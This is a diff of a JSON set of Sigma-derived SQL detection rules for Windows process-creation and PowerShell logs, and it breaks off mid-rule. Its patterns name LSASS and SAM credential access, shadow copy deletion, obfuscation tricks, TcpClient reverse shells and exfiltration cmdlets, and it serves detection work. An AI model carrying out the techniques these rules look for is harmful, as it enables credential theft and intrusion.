"posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE 